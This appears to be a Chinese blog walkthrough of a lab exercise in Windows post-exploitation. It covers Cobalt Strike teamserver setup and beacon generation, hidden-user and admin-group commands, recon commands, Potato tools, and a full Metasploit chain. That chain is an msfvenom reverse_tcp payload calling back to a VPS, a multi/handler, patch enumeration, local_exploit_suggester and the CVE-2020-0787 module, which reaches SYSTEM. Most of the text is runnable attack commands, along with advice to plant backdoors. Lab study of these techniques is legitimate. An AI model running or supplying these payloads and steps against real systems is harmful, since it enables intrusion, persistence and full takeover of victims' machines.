目录
1.安装CS的步骤
1.1 将CS解压至客户机和服务器
客户机:
服务器:
1.2 启动Server服务
在服务器中,进入Server目录:
为文件赋权:
在Server目录下,使用命令:
./teamserver Server-ip password
1.3 客户机连接
在客户机上,双击打开Client目录下的Cobalt_Strike_CN.bat以打开程序,并输入连接配置
Alias:any
Host:Server-ip
Port:50050不变即可
User:any
Passwd:与Serve设置的password一致
点击Connect后,进入主程序
1.4 插件下载
点击Cobalt Strike-监脚本管理器,在plugin目录下选择插件,上传.cna的文件即可:
2.总结用户组和用户、windows信息搜集命令
2.1 用户
2.1.1 显示/创建/删除用户
# 显示所有用户
net user
# 创建用户
net user user1 password1 /add
# 删除用户
net user user1 /del
# 创建隐藏用户
net user user2$ password2 /add
# 删除隐藏用户
net user user2$ /del
2.1.2 创建/删除隐藏用户
2.2 用户组
# 新建用户组:
net localgroup users /add
# 删除用户组:
net localgroup users /de1
# 添加用户到组:
net localgroup users user1 /add
# 从组中删除用户:
net localgroup users user1 /del
# 普通用户提权:(也即是将用户添加到管理员组中)
net localgroup administrator user1 /add2.2.1 新建/删除用户组,为用户组添加用户
执行结果:
2.2.2 删除用户组中的用户,用户提权
执行结果:
2.3 windows信息搜集命令
| systeminfo | 打印系统信息 |
| whoami | 获取当前用户名 |
| whoami /priv | 当前账户权限 |
| ipconfig | 网络配置信息 |
| ipconfig /displaydns | 显示DNS缓存 |
| arp -a | 打印arp表 |
| net user | 列出用户 |
| net user username | 关于用户的信息 |
| net localgroup | 列出所有组 |
| net localgroup GROUP | 关于指定组的信息 |
| tasklist /svc | 列出进程列表 |
| net start | 列出启动的服务 |
| ver | 操作系统版本类型 |
3.总结手工提权思路,拿土豆提权
3.1 手工提权思路
(1)信息收集
系统信息:首先,使用如systeminfo、ver、uname -a(Linux)等命令收集目标系统的基本信息,包括操作系统版本、补丁安装情况、系统架构(32位或64位)、网络配置等。
服务和进程:通过tasklist /svc(Windows)、ps aux(Linux)等命令查看系统上运行的服务和进程,特别注意那些具有潜在提权风险的服务。
用户权限:使用whoami(Windows)、id(Linux)等命令检查当前用户权限,并评估是否足以执行进一步的提权操作。
(2)漏洞扫描与分析
工具扫描:利用Windows-Exploit-Suggester、Linux_Exploit_Suggester等自动化工具,根据收集到的系统信息比对已知漏洞数据库,查找可能存在的未修复漏洞。
手动分析:当自动化工具无法发现漏洞或信息不足时,手动分析系统的:
配置文件(如C:\Windows\System32\drivers\etc\hosts、/etc/passwd、/etc/shadow等)
日志文件(如C:\Windows\System32\winevt\Logs、/var/log)等
寻找可能的提权路径或配置错误。
(3)漏洞利用
筛选EXP:根据漏洞扫描结果,选择与目标系统架构和版本相匹配的EXP。确保EXP的可靠性和稳定性,避免在提权过程中引发安全问题。
上传与执行:将选定的EXP上传到目标系统,可通过网络共享、Web服务器上传、社会工程学等方式实现。执行前,确保EXP的执行环境(如依赖的库、权限要求)已满足,并测试EXP在隔离环境中的表现。
(4)权限提升
执行EXP:在确认环境安全后,执行EXP。如果成功,将获取更高的系统权限。
巩固权限:一旦获得新权限,立即采取措施巩固权限,如创建后门、提升用户权限至管理员级别。
深度搜索:利用新权限探索系统,寻找其他潜在的提权途径或敏感信息。
3.2 土豆提权
3.2.1 土豆资源
| GodPotato | |
| SweetPotato | |
| BadPotato | |
| RoguePotato | |
| CandyPotato | |
| EfsPotato | |
| MultiPotato | |
| RasmanPotato | |
| PetitPotato | |
| JuicyPotatoNG | |
| PrintNotifyPotato | |
| CoercedPotato |
3.2.2 提权Windows 11
(1)查看用户权限
whoami /priv
(2)使用四种土豆提权均失败
4.用CS插件提权Windows Server
新建监听器,可以点击耳机图标,也可以Cobalt Strike-监听器 新建
Name:any
HTTP Hosts:点+来选择
HTTP Port:不冲突,可用即可
点击有效载荷-Windows可执行程序,选择对应的监听器生成木马
将木马放到需要连接的客户机上,每当一个客户机执行了木马程序,主界面中就会有新的记录,这里有本机的windows 11和虚拟机中的windows server 2008。这里每执行一次就会有一个记录,即使是相同客户机,在winserver上我不小心多点了几次-_-||
右键使用工具梼杌进行提权,使用多个插件进行尝试,最后使用了getsystem提权成功。
5.加分项:MSF提权
5.1 msf安装
在vps上使用以下命令安装msf:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && \./msfinstall
5.2 启动msf
命令如下:
msfconsole
5.3 msf生成木马
使用被动连接,木马生成命令如下:
msfvenom -p windows/meterpreter/reverse_tcp lhost=server-ip lport=4399 -f exe -o Herrymsf.exe生成的木马在当前运行目录
根据生成的木马参数,在msf中依次使用以下命令查看并配置需要的参数并检查
use exploit/multi/handler
show options
set payload windows/meterpreter/reverse_tcp
set lport 4399
set lhost server-ip
show options
5.4 监听木马
5.5 传播并激活木马
将木马文件移至受害主机,双击exe运行,返回vps界面,连接成功,记住会话参数session=1
5.6 寻找漏洞
使用指定模块,目标设定为刚才的会话参数session,使用run开始收集
use post/windows/gather/enum_patches
set session 1
run
这里只有三个补丁,应该是我最近为windows server安装vmware tool而下载的必要补丁,对我们找漏洞来说,可以忽略,补丁很少,说明潜在漏洞很多。切换模块,查找漏洞。
use post/multi/recon/local_exploit_suggester
set session 1
run 执行结果中发现有许多可以利用的漏洞
5.7 提权
从第1个开始挨个尝试,发现第6个漏洞是可以直接进行提权成功的,使用该模块,查看需要的参数:
use exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
show options
需要重新配置的参数有session,lhost,lport,配置完成后使用run开始提权
set session 1
set lhost server-ip
set lport 6666
run
成功连接,shell进入,并使用whoami查看身份
已获得system权限,提权成功!
扫一扫
250
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
